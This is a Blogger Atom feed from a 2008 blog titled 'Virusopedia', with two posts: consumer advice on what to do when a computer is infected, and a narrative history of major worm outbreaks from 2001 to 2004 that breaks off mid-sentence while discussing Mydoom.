<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss'><id>tag:blogger.com,1999:blog-2383994250717691599</id><updated>2009-09-28T15:28:35.435-07:00</updated><title type='text'>Largest Online VIRUSOPEDIA</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://virusopedia.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2383994250717691599/posts/default'/><link rel='alternate' type='text/html' href='http://virusopedia.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>PROF. SJAFW</name><uri>http://www.blogger.com/profile/00700919093101522027</uri><email>noreply@blogger.com</email></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>9</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-2383994250717691599.post-3500634811089042520</id><published>2008-06-07T10:08:00.001-07:00</published><updated>2008-06-07T10:10:31.859-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Viral attack'/><category scheme='http://www.blogger.com/atom/ns#' term='mal.exe'/><category scheme='http://www.blogger.com/atom/ns#' term='jithendra.antonio'/><category scheme='http://www.blogger.com/atom/ns#' term='executuble'/><category scheme='http://www.blogger.com/atom/ns#' term='xxx.com'/><category scheme='http://www.blogger.com/atom/ns#' term='sri lanka'/><category scheme='http://www.blogger.com/atom/ns#' term='lk.hp'/><category scheme='http://www.blogger.com/atom/ns#' term='Viruzz'/><category scheme='http://www.blogger.com/atom/ns#' 
term='negombo'/><category scheme='http://www.blogger.com/atom/ns#' term='virus hub'/><category scheme='http://www.blogger.com/atom/ns#' term='commons'/><category scheme='http://www.blogger.com/atom/ns#' term='bnn.mal'/><category scheme='http://www.blogger.com/atom/ns#' term='cey.lk'/><category scheme='http://www.blogger.com/atom/ns#' term='fernando'/><title type='text'>Once you Are attacked by a Virus Hub</title><content type='html'>What to Do If Your Computer Is Infected&lt;br /&gt;Sometimes even an experienced user will not realise that a computer is infected with a virus. This is because viruses can hide among regular files, or camouflage themselves as standard files. This section contains a detailed discussion of the symptoms of virus infection, how to recover data after a virus attack and how to prevent data from being corrupted by malware.&lt;br /&gt;&lt;br /&gt;Symptoms of infection&lt;br /&gt;There are a number of symptoms which indicate that your computer has been infected. If you notice "strange things" happening to your computer, namely:&lt;br /&gt;&lt;br /&gt;unexpected messages or images are suddenly displayed &lt;br /&gt;unusual sounds or music played at random &lt;br /&gt;your CD-ROM drive mysteriously opens and closes &lt;br /&gt;programs suddenly start on your computer &lt;br /&gt;you receive notification from your firewall that some applications have attempted to connect to the Internet, although you did not initiate this, then it is very likely that your computer has been infected by a virus &lt;br /&gt;Additionally, there are some typical symptoms which indicate that your computer has been infected via email:&lt;br /&gt;&lt;br /&gt;your friends mention that they have received messages from your address which you know you did not send &lt;br /&gt;your mailbox contains a lot of messages without a sender's e-mail address or message header &lt;br /&gt;These problems, however, may not be caused by viruses. 
For example, infected messages that are supposedly coming from your address can actually be sent from a different computer.&lt;br /&gt;&lt;br /&gt;There is a range of secondary symptoms which indicate that your computer may be infected:&lt;br /&gt;&lt;br /&gt;your computer freezes frequently or encounters errors &lt;br /&gt;your computer slows down when programs are started &lt;br /&gt;the operating system is unable to load &lt;br /&gt;files and folders have been deleted or their content has changed &lt;br /&gt;your hard drive is accessed too often (the light on your main unit flashes rapidly) &lt;br /&gt;Microsoft Internet Explorer freezes or functions erratically, e.g. you cannot close the application window &lt;br /&gt;90% of the time the symptoms listed above indicate a hardware or software problem. Although such symptoms are unlikely to be caused by a virus, you should use your antivirus software to scan your computer fully.&lt;br /&gt;&lt;br /&gt;What you should do if you notice symptoms of infection&lt;br /&gt;If you notice that your computer is functioning erratically:&lt;br /&gt;&lt;br /&gt;Don't panic! This golden rule may prevent the loss of important data stored in your computer and help you avoid unnecessary stress. &lt;br /&gt;Disconnect your computer from the Internet. &lt;br /&gt;If your computer is connected to a Local Area Network, disconnect it. &lt;br /&gt;If the computer cannot boot from the hard drive (error at startup), try to start the system in Safe Mode or from the Windows boot disk. &lt;br /&gt;Before taking any action, back up all critical data to an external drive (a floppy disk, CD, flash memory, etc.). &lt;br /&gt;Install antivirus software if you do not have it installed. &lt;br /&gt;Download the latest updates for your antivirus database. If possible, do not use the infected computer to download updates, but use a friend's computer, or a computer at your office, an Internet cafe, etc. 
This is important because if you are connected to the Internet, a virus can send important information to third parties or may try to send itself to all email addresses in your address book. You may also be able to obtain updates for your antivirus software on CD-ROM from the software vendors or authorized dealers. &lt;br /&gt;Perform a full system scan. &lt;br /&gt;If no viruses are found during a scan&lt;br /&gt;If no viruses are found during the scan and the symptoms that alarmed you are classified, you probably have no reason to worry. Check all hardware and software installed in your computer. Download Windows patches using Windows Update. Uninstall all unlicensed software from your computer and clean your hard drives of any junk files.&lt;br /&gt;&lt;br /&gt;If viruses are found during a scan&lt;br /&gt;A good antivirus solution will notify you if viruses are found during a scan, and offer several options for dealing with infected objects.&lt;br /&gt;&lt;br /&gt;In the vast majority of cases, personal computers are infected by worms, Trojan programs, or viruses. In most cases, lost data can be successfully recovered.&lt;br /&gt;&lt;br /&gt;A good antivirus solution will provide the option to disinfect infected objects, quarantine possibly infected objects and delete worms and Trojans. A report will provide the names of the malicious software discovered on your computer. &lt;br /&gt;In some cases, you may need a special utility to recover data that have been corrupted. Visit your antivirus software vendor's site, and search for information about the virus, Trojan or worm which has infected your computer. Download any special utilities if these are available. &lt;br /&gt;If your computer has been infected by viruses that exploit Microsoft Outlook Express vulnerabilities, you can fully clean your computer by disinfecting all infected objects, and then scanning and disinfecting the mail client's databases. 
This ensures that the malicious programs cannot be reactivated when messages which were infected prior to scanning are re-opened. You should also download and install security patches for Microsoft Outlook Express. &lt;br /&gt;Unfortunately, some viruses cannot be removed from infected objects. Some of these viruses may corrupt information on your computer when infecting, and it may not be possible to restore this information. If a virus cannot be removed from a file, the file should be deleted. &lt;br /&gt;If your computer has suffered a severe virus attack&lt;br /&gt;Some viruses and Trojans can cause severe damage to your computer:&lt;br /&gt;&lt;br /&gt;If you cannot boot from your hard drive (error at startup), try to boot from the Windows rescue disk. If the system cannot recognize your hard drive, the virus has damaged the disk partition table. In this case, try to recover the partition table using scandisk, a standard Windows program. If this does not help, contact a computer data recovery service. Your computer vendor should be able to provide contact details for such services. &lt;br /&gt;If you have a disk management utility installed, some of your logical drives may be unavailable when you boot from the rescue disk. In this case, you should disinfect all accessible drives, reboot from the system hard drive and disinfect the remaining logical drives.&lt;br /&gt;&lt;br /&gt;Recover corrupted files and applications using backup copies after you have scanned the drive containing this data. &lt;br /&gt;Diagnosing the problem using standard Windows tools&lt;br /&gt;Although this is not recommended unless you are an experienced user, you may wish to:&lt;br /&gt;&lt;br /&gt;check the integrity of the file system on your hard drive (using the CHKDSK program) and repair file system errors. 
If there are a large number of errors, you must back up the most important files to removable storage media before fixing the errors &lt;br /&gt;scan your computer after booting from the Windows rescue disk &lt;br /&gt;use other standard Windows tools, for example, the scandisk utility &lt;br /&gt;For more details on using these utilities, refer to the Windows Help topics.&lt;br /&gt;&lt;br /&gt;If nothing helps&lt;br /&gt;If the symptoms described above persist even after you have scanned your computer, and checked all installed hardware and software and your hard drive using Windows utilities, you should send a message with a full description of the problem to your antivirus vendor's technical support department.&lt;br /&gt;&lt;br /&gt;Some antivirus software developers will analyse infected files submitted by users.&lt;br /&gt;&lt;br /&gt;After you have eradicated the infection&lt;br /&gt;Once you have eradicated the infection, scan all disks and removable storage media that may be infected by the virus.&lt;br /&gt;&lt;br /&gt;Make sure that you have appropriately configured antivirus software installed on your computer.&lt;br /&gt;&lt;br /&gt;Practice safe computing.&lt;br /&gt;&lt;br /&gt;All of these measures will help prevent your computer from getting infected in the future.</content><link rel='replies' type='application/atom+xml' href='http://virusopedia.blogspot.com/feeds/3500634811089042520/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=2383994250717691599&amp;postID=3500634811089042520' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2383994250717691599/posts/default/3500634811089042520'/><link rel='self' type='application/atom+xml' 
href='http://www.blogger.com/feeds/2383994250717691599/posts/default/3500634811089042520'/><link rel='alternate' type='text/html' href='http://virusopedia.blogspot.com/2008/06/once-you-are-attacked-by-virus-hub.html' title='Once you Are attacked by a Virus Hub'/><author><name>PROF. SJAFW</name><uri>http://www.blogger.com/profile/00700919093101522027</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='18053836773761000586'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2383994250717691599.post-3026555115619200654</id><published>2008-06-07T10:00:00.000-07:00</published><updated>2008-06-07T10:06:31.832-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Viral attack'/><category scheme='http://www.blogger.com/atom/ns#' term='win32'/><category scheme='http://www.blogger.com/atom/ns#' term='virusopedia'/><category scheme='http://www.blogger.com/atom/ns#' term='packed generic'/><category scheme='http://www.blogger.com/atom/ns#' term='ctfmon.exe'/><category scheme='http://www.blogger.com/atom/ns#' term='ctcfg.exe'/><category scheme='http://www.blogger.com/atom/ns#' term='Antonion Complex'/><category scheme='http://www.blogger.com/atom/ns#' term='Viro'/><category scheme='http://www.blogger.com/atom/ns#' term='bloodhound'/><category scheme='http://www.blogger.com/atom/ns#' term='zzz'/><category scheme='http://www.blogger.com/atom/ns#' term='Viruzz'/><category scheme='http://www.blogger.com/atom/ns#' term='Viruas'/><title type='text'>The Venture Capital Win 32 ViroHistory</title><content type='html'>History of 4th Decade In Virus History&lt;br /&gt;&lt;br /&gt;2001&lt;br /&gt;2001 was a mixed bag: antivirus vendors took significant strides forward, but the number of virus attacks rose nevertheless. The changeover from classic viruses to worms continued as Internet use exploded. 
Virus writers demonstrated a definite preference for malicious code that propagated by sending their files across local networks and the Internet.&lt;br /&gt;&lt;br /&gt;Significant outbreaks&lt;br /&gt;Malicious programs that exploited vulnerabilities in applications and operating systems caused serious epidemics in 2001: CodeRed, Nimda, Aliz and BadtransII. The large-scale epidemics caused by these worms changed the face of computer security and set trends for malware evolution for several years to come.&lt;br /&gt;&lt;br /&gt;Endless variants of LoveLetter (aka ILoveYou), Magistr and SirCam also enlivened the malware landscape, keeping users and antivirus vendors on their toes.&lt;br /&gt;&lt;br /&gt;Vulnerabilities&lt;br /&gt;A vulnerability is a hole in a legitimate application or operating system that can be exploited by a virus writer: malicious code penetrates the system via such loopholes.&lt;br /&gt;&lt;br /&gt;Viruses and worms that exploit vulnerabilities are particularly dangerous in that they are installed and activated automatically regardless of user action. For instance, Nimda penetrated computers even when the infected email was simply viewed through the preview window in MS Outlook. CodeRed went a step further: it scanned the Internet for vulnerable machines and infected them. According to Kaspersky Virus Lab statistics, malware exploiting vulnerabilities made up almost 55% of all malware detected in 2001.&lt;br /&gt;&lt;br /&gt;The interest displayed by virus writers in vulnerabilities was justified. Traditional infection techniques used by classic file viruses, where the user initiated the infection cycle, were no longer as effective as previously. 
Therefore, virus writers eagerly adopted the new technique.&lt;br /&gt;&lt;br /&gt;Email and the Internet - primary sources of new threats&lt;br /&gt;Kaspersky Virus Lab statistics showed that virus attacks via email rose by 5% in 2001 in comparison with 2000 and made up almost 90% of the total number of virus incidents in 2001.&lt;br /&gt;&lt;br /&gt;2001 proved to be a watershed in the evolution of virus attacks via the Internet. Previously, most Internet-related infections occurred when users downloaded and executed files from untrustworthy web sites. In 2001 a new infection technique appeared: users no longer needed to download files - a visit to an infected web site was enough. Virus writers substituted infected pages for clean ones. Most users were infected by malware that exploited vulnerabilities in MS IE. In some cases compromised sites offered free programs that turned out to be malicious.&lt;br /&gt;&lt;br /&gt;Attacks via non-Internet technologies&lt;br /&gt;2001 was also the year that instant messaging services, such as ICQ and MS Instant Messenger, were first used as channels for spreading malicious code. A spate of worm infections turned these services into further traps for unwary users. The Internet worm Mandragore attacked the Gnutella file-sharing network. And last but not least, 2001 saw a proliferation of worms designed to propagate via IRC channels.&lt;br /&gt;&lt;br /&gt;More attacks on Linux&lt;br /&gt;A significant number of malicious programs targeting Linux appeared in 2001. Ramen opened the season on January 19 and penetrated a large number of corporate networks within days. Victims included NASA (USA), A&amp;M University (USA) and hardware vendor Supermicro (Taiwan).&lt;br /&gt;&lt;br /&gt;The attacks swelled into an avalanche with Ramen clones and new Linux worms appearing one after another. Most of these malicious programs exploited vulnerabilities in the operating system. 
The rapid spread of these threats underlined the lack of preparation by Linux developers, who had been sleeping peacefully, sure that Linux was a completely secure environment. Many Linux users hadn't even bothered to install the patches that were available for some of the exploited vulnerabilities and fell easy prey for these worms.&lt;br /&gt;&lt;br /&gt;Fileless worms - a new challenge&lt;br /&gt;So-called fileless worms turned out to be one of the nastiest surprises of 2001. These worms were able to self-replicate and function on infected machines without using files. These worms exist only in RAM and spread as specially configured data packets.&lt;br /&gt;&lt;br /&gt;This new technique gave antivirus experts some difficult moments. Traditional antivirus scanners and monitors proved helpless against this new threat, since up to that time antivirus engines had detected malicious programs during file operations. Kaspersky Lab was the first to develop a new antivirus filter that scanned incoming data packets in background mode and deleted fileless worms.&lt;br /&gt;&lt;br /&gt;Worms for Windows increase&lt;br /&gt;While classic viruses, (predominantly macro and script viruses) visibly dominated throughout 1999-2000, 2001 was the year of worms for Windows. By the fall, these worms had caused about 90% of all registered virus infections.&lt;br /&gt;&lt;br /&gt;The reasons for this trend were two-fold: on the one hand new technologies allowed virus writers to create better worms, and on the other, antivirus vendors had developed effective protection against macro and script viruses.&lt;br /&gt;&lt;br /&gt;Virus hoaxes&lt;br /&gt;Virus hoaxes were all the rage in 2001, with 10 new warnings about a dangerous new virus registered by March. And nervous users, frightened by the large-scale outbreaks in 2000 scrambled to forward these warnings to friends and relatives. California IBM and Girl Thing proved especially effective. 
A letter warning users about a new ILoveYou outbreak scheduled for Valentine's day was also extremely effective.&lt;br /&gt;&lt;br /&gt;Some of these hoaxes were so effective that copies of the messages were still circulating around the Internet several years later.&lt;br /&gt;&lt;br /&gt;2001 in review:&lt;br /&gt;Email and the Internet move to the fore as environments for new threats; &lt;br /&gt;Alternate channels such as ICQ, IRC, MSN Messenger and file-sharing networks also gain prominence; &lt;br /&gt;Fileless worms appear on the scene; &lt;br /&gt;Worms for Windows make up the majority of new threats by mid-year, with macro and script viruses losing ground significantly. &lt;br /&gt;&lt;br /&gt;2002&lt;br /&gt;There were 12 significant and 34 less serious virus outbreaks in 2002, along with continuing activity caused by viruses from previous years. Virus writers actively penetrated new platforms, applications and technologies.&lt;br /&gt;&lt;br /&gt;2002 Highlights&lt;br /&gt;Two new flash worms, LFM and Donut, appeared in January: both of these worms were designed to spread in the .NET environment. Fortunately, both worms turned out to be only proof-of-concept viruses and no infections were registered.&lt;br /&gt;&lt;br /&gt;In May, we saw Spida, a worm that attacked SQL servers, and Benjamin, a virus that triggered a whole series of copycat malware targeted at the Kazaa file-sharing network.&lt;br /&gt;&lt;br /&gt;Malware for Linux&lt;br /&gt;The worm Slapper finally convinced all remaining skeptics that Linux users need to be just as aware of security issues as users of all other operating systems. Slapper penetrated thousands of machines running Linux within a few days. 
Users of FreeBSD also got a timely reminder about security: a new worm called Scalper struck FreeBSD machines in September, though the damage did not escalate to the proportions caused by Slapper.&lt;br /&gt;&lt;br /&gt;Professional virus writers&lt;br /&gt;This was the year professional writers got down to business: there was a significant increase in malicious programs designed to commit financial fraud. These programs stole passwords, confidential data, Internet access information and other data that allowed virus writers to make money by using the harvested data.&lt;br /&gt;&lt;br /&gt;Worms&lt;br /&gt;Email worms, such as Klez and Lentin had already been popular prior to 2002. However, a new breed of email worms superseded the older versions: these new email worms spread by connecting directly to built-in SMTP servers on infected machines.&lt;br /&gt;&lt;br /&gt;This development grew out of increased security measures which prevented worms from spreading via MS Outlook and other email clients. Email system developers integrated either antivirus protection or special functionality preventing unauthorized mailings. As a result, virus writers focused on worms that were able to avoid these measures.&lt;br /&gt;&lt;br /&gt;Worms multiplying in other environments, such as LANs, P2P, IRC and so forth, disappeared almost entirely in this year.&lt;br /&gt;&lt;br /&gt;Klez&lt;br /&gt;An Internet worm named Klez caused the most serious outbreak of the year. Klez was first detected on 26 October and remained on the list of the most widespread malicious programs for the next two years. This is a record in virusology that is yet to be broken. New Klez variants, Klez.e and Klez.h were the most active Klez clones. Altogether, by the end of 2002, 6 out of 10 registered infections were caused by Klez.&lt;br /&gt;&lt;br /&gt;Though Klez caused the most serious outbreak during 2002, several other worms provided some stiff competition: Lentin and Tanatos (aka Bugbear). 
In fact, Lentin surpassed Klez in the number of incidents by the end of the year.&lt;br /&gt;&lt;br /&gt;Vulnerabilities&lt;br /&gt;The trend to exploit vulnerabilities that first became significant in 2001 continued: virus writers homed in on the IFRAME vulnerability in MS Internet Explorer to create worms including Klez, Lentin and Tanatos. Altogether, these accounted for 85% of all virus incidents.&lt;br /&gt;&lt;br /&gt;Classic viruses&lt;br /&gt;Interestingly enough, macro viruses rose to the fore among classic viruses this year. Macro viruses for MS Word - Thus, TheSecond, Marker and Flop - were the most widespread. These viruses had first appeared in the late 1990s, but they resurfaced in 2002. The most likely reason is the increased number of Windows users who were all sure that macro viruses were a thing of the past. Inconvenient security measures were abandoned and the result was a second round of old viruses. The majority of infections were caused by Elkern, CIH, FunLove and Spaces.&lt;br /&gt;&lt;br /&gt;On the plus side, script viruses and other classic viruses almost disappeared in 2002.&lt;br /&gt;&lt;br /&gt;Virus hoaxes&lt;br /&gt;The upsurge in virus hoaxes that began in 2001 continued into 2002. Users worldwide flooded each other with new and old hoaxes: JDBGNR, Ace-?, SULFNBK, Virtual Card for You, California IBM and Girl Thing.&lt;br /&gt;&lt;br /&gt;2002 summary&lt;br /&gt;By the end of the year, an interesting pattern emerged in the spread of malicious programs. In previous years, the overwhelming majority of virus incidents were connected to a small number of viruses, typically 2-3. By September 2002, however, this pattern was broken: more and more infections were caused by viruses which did not make it to the top twenty.&lt;br /&gt;&lt;br /&gt;Increased end user awareness regarding security issues and willingness to adopt precautionary methods undoubtedly played a role in this development. 
Correct protective techniques implemented by end users led to a decrease in the number of incidents caused by individual viruses.&lt;br /&gt;&lt;br /&gt;And yet, the overall number of infections did not decrease, meaning that the overall number of malicious programs in the wild had grown. Even though no single virus caused a significant outbreak, together they constituted an impressive volume.&lt;br /&gt;&lt;br /&gt;2003&lt;br /&gt;In 2003 two global Internet attacks took place that could be called the biggest in the history of the Internet. The Internet worm Slammer laid the foundation for the attacks, and used a vulnerability in MS SQL Server to spread. Slammer was the first classic fileless worm, which fully illustrated the capabilities of a flash worm - capabilities which had been foreseen several years before.&lt;br /&gt;&lt;br /&gt;On January 25th, 2003, within the space of a few minutes, the worm infected hundreds of thousands of computers throughout the world, and increased network traffic to the point where several national segments of the Internet crashed. Experts estimate that traffic increased by between 40% and 80% in a variety of networks. The worm attacked computers through ports 1433 and 1434 and on penetrating machines did not copy itself to any disk, but simply remained in computer memory. If we analyse the dynamics of the epidemic, we can assert that the worm originated in the Far East.&lt;br /&gt;&lt;br /&gt;The second, more important epidemic was caused by the Lovesan worm, which appeared in August 2003. The worm demonstrated just how vulnerable Windows is. Just as Slammer did, Lovesan exploited a vulnerability in Windows in order to replicate itself. The difference was that Lovesan used a loophole in the RPC DCOM service working under Windows 2000/XP. This led to almost every Internet user being attacked by the worm.&lt;br /&gt;&lt;br /&gt;As for viruses penetrating new platforms and applications, the year was surprisingly quiet. 
The only news was the discovery, in the wild, of MBP.Kynel, by Kaspersky Labs. This virus infects MapInfo documents and is written in MapBasic. The MBP.Kynel virus was undoubtedly written by a Russian.&lt;br /&gt;&lt;br /&gt;2003 was the year of ceaseless epidemics caused by email worms. Ganda and Avron were first detected in January. The former was written in Sweden and is still one of the most widespread email worms in Scandinavia despite the fact that the Swedish police arrested the author of the worm at the end of March.&lt;br /&gt;&lt;br /&gt;Avron was the first worm to be created in the former USSR capable of causing a significant worldwide epidemic. The source code for the worm was published on the Internet and this has led to the appearance of a number of less effective versions.&lt;br /&gt;&lt;br /&gt;Another important event in 2003 was the appearance of the first Sobig worm in January. Worms from this family all caused significant virus outbreaks but it was version 'f' which broke all records, becoming the most widely distributed worm in network traffic in Internet history. At the peak of the epidemic, Sobig.f, which was first detected in August, could be found in every 20th email message. The virus writers who created the Sobig family were aiming to create a network of infected machines with the aim of conducting DoS attacks on arbitrarily selected sites and also to use the network for spam attacks.&lt;br /&gt;&lt;br /&gt;The Tanatos.b email worm was also a notable event in virusology. The first version of Tanatos was written in the middle of 2002, but version 'b' appeared only a year later. The worm exploited the well-known IFRAME loophole in MS Outlook to automatically launch itself from infected messages. 
Tanatos caused one of the most significant email epidemics of 2003, coming second to that caused by Sobig.f, which probably has the record for the most machines infected by an email worm.&lt;br /&gt;&lt;br /&gt;Worms from the Lentin family continued to appear. All these worms were written in India by a local hacker group as part of the 'virtual war' between Indian and Pakistani hackers. The most widespread versions were 'm' and 'o', where the virus replicated in the form of a ZIP archive file attached to infected messages.&lt;br /&gt;&lt;br /&gt;Russian writers remained active; the second worm from the former USSR which also caused a global epidemic was Mimail. The worm used the latest vulnerability in Internet Explorer to activate itself. The vulnerability allowed binary code to be extracted from HTML files and executed. This was first used in Russia in May 2003 (Trojan.Win32.StartPage.l). Following this, the vulnerability was used by the Mimail family and several other Trojan programs. The authors of the Mimail worm published the source code on the Internet, which led to the appearance of several new varieties of the worm in November 2003, written by other virus writers.&lt;br /&gt;&lt;br /&gt;September was the month of Swen. I-Worm.Swen, masquerading as a patch from Microsoft, managed to infect several hundred thousand computers throughout the world and to date remains one of the most widespread email worms. The author of the virus exploited frightened users who were still nervous after the recent Lovesan and Sobig.f epidemics.&lt;br /&gt;&lt;br /&gt;A recent significant epidemic was caused by Sober, a relatively simple mail worm written by a German; it is an imitation of the year's leader, Sobig.f.&lt;br /&gt;&lt;br /&gt;In 2002, the trend was towards an increase in the number of backdoor and spy Trojan programs and this continued in 2003. In this category, Backdoor.Agobot and Afcore were most notable. 
There are now more than 40 varieties of Agobot in existence, since the author of the original version created a network of websites and IRC channels where anyone who wanted could, for a fee starting from $150, become the owner of an 'exclusive' version of Backdoor-a, which would be created in accordance with the client's wishes.&lt;br /&gt;&lt;br /&gt;Afcore is slightly less widespread. However, in order to mask its presence in the system, it uses an unusual method; it places itself in additional file systems of the NTFS systems, i.e. in the catalogue stream, not the file streams.&lt;br /&gt;&lt;br /&gt;A new and potentially dangerous trend was identified at the end of 2003; a new type of Trojan, TrojanProxy. This was the first and clearest sign of virus writers and spammers uniting. Spammers began using machines infected by such Trojan programs for mass spammer attacks. It is also clear that spammers participated in a number of epidemics as malicious programs were spread using spamming technology.&lt;br /&gt;&lt;br /&gt;Internet worms constituted the second most active class of viruses in 2003; specifically I-Worms which replicated by seizing passwords to remote network resources. As a rule, such worms are based on IRC clients, and scan the addresses of IRC users. They then attempt to penetrate computers using the NetBIOS protocol and port 445. One of the most notable viruses in this class was the Randon family of Internet worms.&lt;br /&gt;&lt;br /&gt;Throughout the year Internet worms remained the dominant type of malicious software.&lt;br /&gt;&lt;br /&gt;Viruses, namely macro viruses such as Macro.Word97.Saver came in second. However, Trojan programs overtook viruses in the autumn, and this trend continues through today.&lt;br /&gt;&lt;br /&gt;Where We've Been and Where We're Going&lt;br /&gt;Worms - trendsetting in 2003&lt;br /&gt;The trends in virusology that we observe today have their primary roots in the second half of 2003. 
Internet worms Lovesan, Sobig, Swen and Sober not only caused global epidemics, but also profoundly changed the malware landscape. Each of these malicious programs set new standards for virus writers.&lt;br /&gt;&lt;br /&gt;Once a piece of malware which uses fundamentally new techniques to propagate or infect victim machines appears, virus writers are quick to adopt the new approach. Today's new threats all incorporate characteristics of Lovesan, Sobig, Swen or Sober. Therefore, in order to understand what virus writers are doing currently, and to predict what the future may bring, we need to examine this quartet of worms carefully.&lt;br /&gt;&lt;br /&gt;Lovesan&lt;br /&gt;Lovesan appeared in August 2003 and infected millions of computers worldwide in just a few days. This Internet worm propagated by exploiting a critical vulnerability in MS Windows. Lovesan spread directly via the Internet, moving from computer to computer, ignoring methods such as IRC, P2P and email, which were popular at the time. The Morris worm first used this propagation method in 1988, but it took 15 years for another virus writer to take advantage of this particular technique.&lt;br /&gt;&lt;br /&gt;To some extent, Lovesan was a copycat worm; by exploiting an MS Windows vulnerability, it followed in Slammer's footsteps. However, although Slammer, which struck in January 2003, infected approximately half a million computers, it did not achieve the same infection rates as Lovesan.&lt;br /&gt;&lt;br /&gt;Slammer was also the first classic file-less worm - certainly an achievement, in a perverse way, for the coder, since writing a viable file-less worm requires strong programming skills. As a matter of fact, there has only been one other moderately 'successful' file-less worm since Slammer - Witty, which made its appearance in March 2004.&lt;br /&gt;&lt;br /&gt;Lovesan also started another trend - the inclusion of DoS attacks on corporate sites as part of the worm's payload. 
Lovesan attacked Microsoft, and had the attack been successful, millions of users worldwide would have been unable to download the patches they needed to protect their machines from the worm. Fortunately, the DoS attack failed, but Microsoft did re-engineer their web server architecture in response.&lt;br /&gt;&lt;br /&gt;To summarize, Lovesan set the following trends:&lt;br /&gt;&lt;br /&gt;Exploiting critical vulnerabilities in MS Windows &lt;br /&gt;Propagation via the Internet through direct connections to victim machines &lt;br /&gt;Organising DoS and DDoS attacks on key websites &lt;br /&gt;Sobig.f&lt;br /&gt;Sobig.f followed hard on the heels of Lovesan in August 2003 and created the first serious email worm outbreak of the twenty-first century. At the height of the epidemic one out of 10 email messages was infected by Sobig. Email traffic increased ten fold and included millions of messages from antivirus programs faithfully informing spoofed senders about the detected and deleted malware.&lt;br /&gt;&lt;br /&gt;Sobig.f did not exploit any vulnerabilities, and the message attributes (message subject etc.) were also nothing out of the ordinary. However, Sobig's payload included a backdoor function that left antivirus professionals waiting with bated breath for August 22 - the date when all Sobig-controlled zombies were scheduled to receive a mystery command. Fortunately, the server where the command was to be launched was shut down in time, but Sobig.f continues to plague the Internet community, remaining one of the most common viruses worldwide.&lt;br /&gt;&lt;br /&gt;Large-scale epidemics are not caused by classic worms released into the wild from a few computers. These classic worms often take weeks or even months to reach a peak of activity. Sobig.f was no exception to this rule: it exploited machines infected previously by prior versions. 
Sobig.a appeared in January 2003 and was followed by several modifications, all of which conscientiously built a network of infected machines, machine by machine. Once critical mass was reached, Sobig.f struck.&lt;br /&gt;&lt;br /&gt;Sobig.f initiated the wave of large-scale email worm outbreaks seen in 2004, and this wave will continue to break until some new technique is invented! Sobig brought two innovative techniques to the world of malware:&lt;br /&gt;&lt;br /&gt;The creation of networks of infected machines to serve as epidemic platforms &lt;br /&gt;Mass mailing of malware using spammer techniques &lt;br /&gt;Swen&lt;br /&gt;Let's move on in time to September 18, 2003. Early in the morning, Kaspersky Lab received a sample from New Zealand. The worm looked interesting, but nobody anticipated an epidemic. However, 6 hours later cries for help from infected users worldwide proved that a new and dangerous virus had joined the fray.&lt;br /&gt;&lt;br /&gt;At first glance, Swen seemed to be yet another worm using standard propagation methods - email, IRC and P2P networks. However, Swen stood out from the crowd for its stunningly successful social engineering. The worm arrived disguised as a patch from Microsoft which would supposedly secure all vulnerabilities. The message included Microsoft logos, links to real Microsoft resources and a very convincing text. Recipients, scared by the recent publicity about the Lovesan and Sobig outbreaks, and having absorbed the lesson that patching is essential, obediently clicked on the link. 
The email was so convincing that many experienced users were caught out, joining droves of less informed users in launching the worm.&lt;br /&gt;&lt;br /&gt;The resulting outbreak was certainly less serious than the ones caused by Lovesan and Sobig (only 350 infected servers were used to spread Swen); however, Swen did prove that social engineering works, and works very well indeed when properly implemented.&lt;br /&gt;&lt;br /&gt;Sober&lt;br /&gt;Sober is the final entrant in the list of interesting worms from 2003. Sober is a Sobig copycat, but had some innovative features. Infected emails came in many languages, with the language chosen being determined by the recipient's IP address. Sober also exploited social engineering techniques by pretending to be a removal tool for Sobig.&lt;br /&gt;&lt;br /&gt;2004&lt;br /&gt;2004 has so far given us many new and original malicious programs. Some of these incorporate last year's developments, but many new features and proof of concept viruses demonstrate that the computer underground is still thriving and continuing to evolve.&lt;br /&gt;&lt;br /&gt;January 2004&lt;br /&gt;A new Trojan proxy, Mitglieder, appeared in the first week of the new year. Thousands of ICQ users received a message inviting them to visit a specified site. Users who clicked on the link then turned to antivirus vendors for help. The site contained a Trojan that used a vulnerability in MS IE to install and launch a proxy server on the victim machine without the user's knowledge. The proxy opened a port, making it possible for a remote user to send and receive email using the infected machine. Victim machines were transformed into zombies spewing out spam. 
Virus writers quickly adopted the two new techniques introduced in Mitglieder:&lt;br /&gt;&lt;br /&gt;Mass mailings of links to infected sites via email or ICQ &lt;br /&gt;Trojan proxies became a separate class of malware closely linked to spammers &lt;br /&gt;Last but not least, Mitglieder also created a network of zombie machines - but the world only found out about this when Bagle struck.&lt;br /&gt;&lt;br /&gt;Bagle seems to have been written by the same group which authored Mitglieder. Bagle also either installed a Trojan proxy server or downloaded it from the Internet. In any case, the worm was simply an improved version of Mitglieder, with the ability to propagate by email. Moreover, Bagle was sent from machines infected by Mitglieder.&lt;br /&gt;&lt;br /&gt;And finally, the most serious virus epidemic in computer history to date: the worm Mydoom.a. It propagated using a network of zombie machines infected in advance (like Sobig), used a clever bit of social engineering (like Swen), incorporated an effective backdoor function and was programmed to conduct a DoS attack on a corporate site (like Lovesan).&lt;br /&gt;&lt;br /&gt;This concatenation of features copied from three highly viable worms broke all records. Mydoom.a created more email traffic than the recent leader 